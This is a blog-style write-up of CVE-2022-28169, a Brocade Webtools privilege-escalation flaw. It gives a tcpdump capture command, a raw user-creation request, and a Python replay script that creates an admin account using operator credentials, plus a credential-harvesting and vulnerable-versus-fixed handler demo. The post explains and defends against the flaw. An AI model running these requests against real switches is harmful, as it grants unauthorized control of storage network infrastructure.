Brocade Fabric OS runs the Fibre Channel switches used in storage area networks everywhere, from enterprise data centers to cloud platforms, so the security of its management interfaces matters. In this post, we break down CVE-2022-28169, a privilege-escalation vulnerability in Brocade Webtools, the web-based management utility shipped with many Brocade switches. We'll explain how it works, how it can be exploited, and what you should do to stay protected.

Overview of CVE-2022-28169

Affected Software:
Brocade Fabric OS versions *before* v9.1.1, v9.0.1e, and v8.2.3c.

What’s the Issue?
A standard (non-admin) Webtools user can gain admin-level rights. In short, a low-privilege account can create a new admin user, something only real admins should be able to do.

Key Vulnerability:
The Authorization header sent in HTTP requests is accepted without a proper role check. A non-admin (for example an "operator") can send the same user-creation request an admin would, carrying only their own credentials, and the backend grants it. Because earlier versions do not force HTTPS by default, those headers can also be captured on the wire.

Step-By-Step Exploitation

Let’s walk through how this can be used in a real attack. This is for educational purposes only—do not attempt this on any system you do not own.

1. Intercepting Web Session Traffic

Brocade Webtools communicates over HTTP. If HTTPS isn't enabled or is misconfigured, the session information (the Authorization header) travels in clear text.

An attacker positioned on the network path can capture that traffic with tools like Wireshark, mitmproxy, or tcpdump.

# Using tcpdump to capture the plain-HTTP management session (adjust the interface name):
sudo tcpdump -i eth0 port 80 -w brocade-session.pcap

2. Grabbing Authorization Tokens

The attacker captures HTTP requests from both an admin and a non-admin (operator) session. Each request carries an Authorization header that looks like this:

Authorization: Basic YWRtaW46cGFzc3dvcmQ=

(The base64 encoding of <username>:<password>; this one decodes to admin:password. Base64 is an encoding, not encryption, so anyone who captures the header has the credentials.)

3. Replaying or Reusing Authorization Header

Normally, even when an operator is authenticated, trying to create a new user via the Webtools interface (or by sending a POST request to /rest/users) should fail, because only admins are allowed to do that.

But if the attacker takes the user-creation request an admin would send and attaches an operator's Authorization header (their own, or one captured in step 2), Brocade Webtools fails to enforce the role restriction and *grants* the request.

Here's a sample intercepted request in which an operator creates a new user:

POST /rest/users HTTP/1.1
Host: brocade-switch-ip
Authorization: Basic b3BlcmF0b3I6b3BlcmF0b3JwYXNz
Content-Type: application/json

{
  "username": "newsuperadmin",
  "password": "mySecur3Pass!",
  "roles": ["admin"]
}

If this Authorization header belongs to an operator rather than an admin (the value above decodes to operator:operatorpass), the request still succeeds on vulnerable versions.

4. Result: New Admin User

With this, the attacker creates a new top-level admin user, escalating from operator to full control of the switch.

Here's an example (for demo only!) in Python that replays such a request:

import requests

# Demo only: replays the user-creation request using an operator's credentials.
url = 'http://brocade-switch-ip/rest/users'

headers = {
  'Authorization': 'Basic b3BlcmF0b3I6b3BlcmF0b3JwYXNz',  # base64 of operator:operatorpass; replace with the captured value
  'Content-Type': 'application/json'
}

data = {
  'username': 'hackeradmin',
  'password': 'Sup3rSecret123',
  'roles': ['admin']
}

# On a vulnerable release this returns a success status even though the caller is only an operator.
response = requests.post(url, json=data, headers=headers, timeout=10)
print(response.status_code)
print(response.text)

Why Does This Happen?

Brocade's backend authenticates the Authorization header but does not re-check the caller's role at the business-logic level before the admin-only operation runs, so any valid low-privilege credential is enough. On top of that, legacy Fabric OS versions may not enforce HTTPS, which makes intercepting those credentials straightforward.
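As an added example (not code from this post's author or from Brocade), here is a Python script that ties step 2 to the root cause. It pulls Basic credentials out of constructed raw HTTP requests, then replays the operator's user-creation request against a toy handler that has the flaw described above and against a hardened one that checks the caller's role before acting. The /rest/users path, the JSON body shape, and the account names and passwords are this post's illustrative values, not a documented Fabric OS API.

```python
import base64
import binascii
import json

# Constructed sample traffic: two plain-HTTP requests as they would appear on
# the wire (not a real capture). The Basic values decode to admin:password and
# operator:operatorpass, the illustrative credentials used in this post.
CAPTURED = [
    b"GET /rest/users HTTP/1.1\r\n"
    b"Host: brocade-switch-ip\r\n"
    b"Authorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n\r\n",
    b"POST /rest/users HTTP/1.1\r\n"
    b"Host: brocade-switch-ip\r\n"
    b"Authorization: Basic b3BlcmF0b3I6b3BlcmF0b3JwYXNz\r\n"
    b"Content-Type: application/json\r\n\r\n"
    b'{"username": "newsuperadmin", "password": "mySecur3Pass!", "roles": ["admin"]}',
]

# Assumed account store standing in for the switch's user database.
USERS = {
    "admin":    {"password": "password",     "role": "admin"},
    "operator": {"password": "operatorpass", "role": "operator"},
}

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body); header names lowercased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def decode_basic(value):
    """Return (user, password) from a 'Basic <base64>' value, or None if malformed."""
    scheme, _, blob = value.strip().partition(" ")
    if scheme.lower() != "basic" or not blob:
        return None
    try:
        user, sep, password = base64.b64decode(blob, validate=True).decode().partition(":")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return (user, password) if sep else None

def harvest_credentials(capture):
    """Step 2: list every (method, path, user, password) visible in the capture."""
    found = []
    for raw in capture:
        method, path, headers, _ = parse_request(raw)
        creds = decode_basic(headers.get("authorization", ""))
        if creds:
            found.append((method, path) + creds)
    return found

def authenticate(headers, users):
    """Return the caller's username if the Basic header matches a known account, else None."""
    creds = decode_basic(headers.get("authorization", ""))
    if creds and users.get(creds[0], {}).get("password") == creds[1]:
        return creds[0]
    return None

def create_user_vulnerable(headers, body, users):
    """Mirrors the flaw: authentication only, so any caller may create a user with any role."""
    caller = authenticate(headers, users)
    if caller is None:
        return 401
    req = json.loads(body)
    users[req["username"]] = {"password": req["password"], "role": req["roles"][0]}
    return 201

def create_user_fixed(headers, body, users):
    """Hardened form: authenticate, then enforce the caller's role before the admin-only action."""
    caller = authenticate(headers, users)
    if caller is None:
        return 401
    if users[caller]["role"] != "admin":
        return 403
    req = json.loads(body)
    if req["username"] in users:
        return 409
    users[req["username"]] = {"password": req["password"], "role": req["roles"][0]}
    return 201

def replay(handler, raw_request):
    """Replay a captured request against a handler on a fresh copy of the store.
    Returns (status, role of 'newsuperadmin' afterwards or None if it was not created)."""
    store = {k: dict(v) for k, v in USERS.items()}
    _, _, headers, body = parse_request(raw_request)
    status = handler(headers, body, store)
    return status, store.get("newsuperadmin", {}).get("role")

if __name__ == "__main__":
    for row in harvest_credentials(CAPTURED):
        print("%s %s -> %s:%s" % row)
    print("vulnerable handler:", replay(create_user_vulnerable, CAPTURED[1]))
    print("fixed handler:     ", replay(create_user_fixed, CAPTURED[1]))
```

The vulnerable handler returns 201 and leaves a new admin account behind for the operator's request; the hardened one returns 403 and changes nothing, because the role check happens after authentication and before any state is touched. That ordering is the whole fix: authentication tells you who is calling, authorization decides whether that caller may do this particular thing.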

Brocade’s original security advisory:

Broadcom Security Advisory SA18861

CVE details:

NIST NVD CVE-2022-28169

Conclusion

CVE-2022-28169 shows how dangerous weak web management can be, especially in enterprise storage environments. Small mistakes, like failing to enforce privilege checks on admin-only operations or not encrypting management traffic, can hand attackers total control. Keep your firmware up to date, segment your management networks, and keep a close eye on who holds admin rights.

Stay safe, and patch your switches!

*If you found this article useful, feel free to share! Questions or advice needed? Leave a comment below.*


Further Reading:
- Using Wireshark to Capture Web Authentication
- How HTTP Basic Authentication Works
- Brocade Fabric OS Documentation

Timeline

Published on: 10/25/2022 21:15:00 UTC
Last modified on: 03/02/2023 16:05:00 UTC